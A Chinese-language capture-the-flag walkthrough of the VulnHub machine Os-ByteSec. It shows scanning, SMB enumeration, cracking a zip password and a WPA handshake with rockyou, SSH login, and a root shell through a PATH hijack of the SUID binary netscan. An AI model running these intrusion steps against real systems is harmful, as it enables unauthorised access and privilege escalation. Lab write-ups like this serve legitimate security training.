靶机测试Os-ByteSec笔记
靶机描述
Difficulty : Intermediate
Flag : 2 Flag first user And second root
Learning : exploit | SMB | Enumration | Stenography | Privilege Escalation
Contact … https://www.linkedin.com/in/rahulgehlaut/
This works better with VirtualBox rather than VMware.
靶机地址
https://www.vulnhub.com/entry/hacknos-os-bytesec,393/
测试过程
主机存活探测
 .\fscan64.exe -h 192.168.1.0/24
start infoscan
(icmp) Target 192.168.1.1     is alive
(icmp) Target 192.168.1.53    is alive
(icmp) Target 192.168.1.105   is alive
(icmp) Target 192.168.1.103   is alive
(icmp) Target 192.168.1.106   is alive
(icmp) Target 192.168.1.101   is alive
[*] Icmp alive hosts len is: 6
192.168.1.1:80 open
192.168.1.106:80 open
192.168.1.53:22 open
192.168.1.106:139 open
192.168.1.105:135 open
192.168.1.105:3306 open
192.168.1.106:445 open
192.168.1.105:443 open
192.168.1.105:445 open
192.168.1.105:139 open
[*] alive ports len is: 10
start vulscan
[*] NetInfo:
[*]192.168.1.105
   [->]yesir
   [->]192.168.1.105
   [->]192.168.136.1
   [->]192.168.59.1
   [->]192.168.22.1
   [->]10.10.10.1
   [->]192.168.56.1
[*] WebTitle: http://192.168.1.106      code:200 len:3086   title:Hacker_James
[*] 192.168.1.106  (Windows 6.1)
[*] WebTitle: https://192.168.1.105     code:403 len:0      title:None
[*] WebTitle: http://192.168.1.1        code:200 len:819    title:TL-WDR5620
[*] NetBios: 192.168.1.106   nitin.168.1.7                       Windows 6.1
[+] SSH:192.168.1.53:22:root 123456
 根据网络情况判断,主机192.168.1.106是目标靶机
nmap 端口探查
└─$ nmap -sV -sC 192.168.1.106 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-05 18:25 CST
Nmap scan report for 192.168.1.106
Host is up (0.0015s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
|   256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_  256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: 0s
|_nbstat: NetBIOS name: NITIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-01-05T10:26:05
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: nitin
|   NetBIOS computer name: NITIN\x00
|   Domain name: 168.1.7
|   FQDN: nitin.168.1.7
|_  System time: 2023-01-05T15:56:05+05:30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.75 seconds
zsh: segmentation fault  nmap -sV -sC 192.168.1.106
 发现目标的端口服务器有
139 445 为 smb 服务netBions name NITIN smbba4.3.11 Ubuntu
80 端口为 web 服务
2525 端口为 ssh 服务
网站目录扫描
└─$ gobuster dir -u http://192.168.1.106/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                                                                                    139 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.106/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/01/05 18:45:07 Starting gobuster in directory enumeration mode
===============================================================
/news                 (Status: 301) [Size: 313] [--> http://192.168.1.106/news/]
/img                  (Status: 301) [Size: 312] [--> http://192.168.1.106/img/] 
/html                 (Status: 301) [Size: 313] [--> http://192.168.1.106/html/]
/gallery              (Status: 301) [Size: 316] [--> http://192.168.1.106/gallery/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.1.106/css/]    
/js                   (Status: 301) [Size: 311] [--> http://192.168.1.106/js/]     
/server-status        (Status: 403) [Size: 278]   
 访问 80 端口

检测 smb 服务安全
nmap检测smb服务
└─$ nmap -v -p139,445 --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.1.106                  

发现没有可用的
smbmap 列出共享
smbmap -H 192.168.1.106 

发现可以匿名访问但是均都没有任何权限
enum4linux 测试 smb 安全
enum4linux -U 192.168.1.106

可以匿名登录 同时发现存在 smb 用户
enum4linux 192.168.1.106
上面这条命令 全方位测试 smb 服务安全 枚举用户 共享文件

发现用户 sagar blackjax smb 把重点放在 smb 用户上
用 smbmap 列出用户共享目录
smbmap -H 192.168.1.106 -u smb
smbclient 访问目录
smbclient 访问 smb 隐藏目录
smbclient //192.168.1.106/smb -U smb
密码为空 用过命令 ls 列出当前文件。
get main.txt safe.zip 通过 get 命令下载这两个文件

fcrackzip 破解 zip 文件
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

这里面rockyou.txt.gz的解压命令是
gzip -d rockyou.txt.gz
发现密码是hacker1
解压压缩包,发现两个文件
破解 user.cap 文件
user.cap 里面是一些包信息。
aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap
                               Aircrack-ng 1.6 
      [00:00:00] 1338/10303727 keys tested (7349.92 k/s) 
      Time left: 23 minutes, 21 seconds                          0.01%
                           KEY FOUND! [ snowflake ]
      Master Key     : 88 D4 8C 29 79 BF DF 88 B4 14 0F 5A F3 E8 FB FB 
                       59 95 91 7F ED 3E 93 DB 2A C9 BA FB EE 07 EA 62 
      Transient Key  : 1F 89 42 F4 E2 74 8B 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
      EAPOL HMAC     : ED B5 F7 D9 56 98 B0 5E 25 7D 86 08 C4 D4 02 3D 
 得到 ESSID 的名字 blackjax KEY snowflake
登录 ssh
ssh -p 2525 blackjax@192.168.1.106

获取 user.txt

特权提升
找到 suid 文件
查找根本目录下所有带用 suid 属性的文件
find / -type f -perm -u=s 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/at
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/netscan
/usr/bin/sudo
/bin/ping6
/bin/fusermount
/bin/mount
/bin/su
/bin/ping
/bin/umount
/bin/ntfs-3g
 运行 netscan

发现与 netstat -tlnp 相似
分析 netscan 文件
xxd /usr/bin/netscan | less

发现调用 netstat 命令
提权 root
创建文件 netstat
cd /tmp
echo "/bin/sh" >netstat
chmod 775 netstat

查看当前环境变量 echo $PATH

设置环境变量
export PATH=/tmp:$PATH
netscan

拿到 root.txt


——比起自己的生命还要重要的东西,并不是这么好找的
转载:https://blog.csdn.net/qq_56426046/article/details/128569230
 
					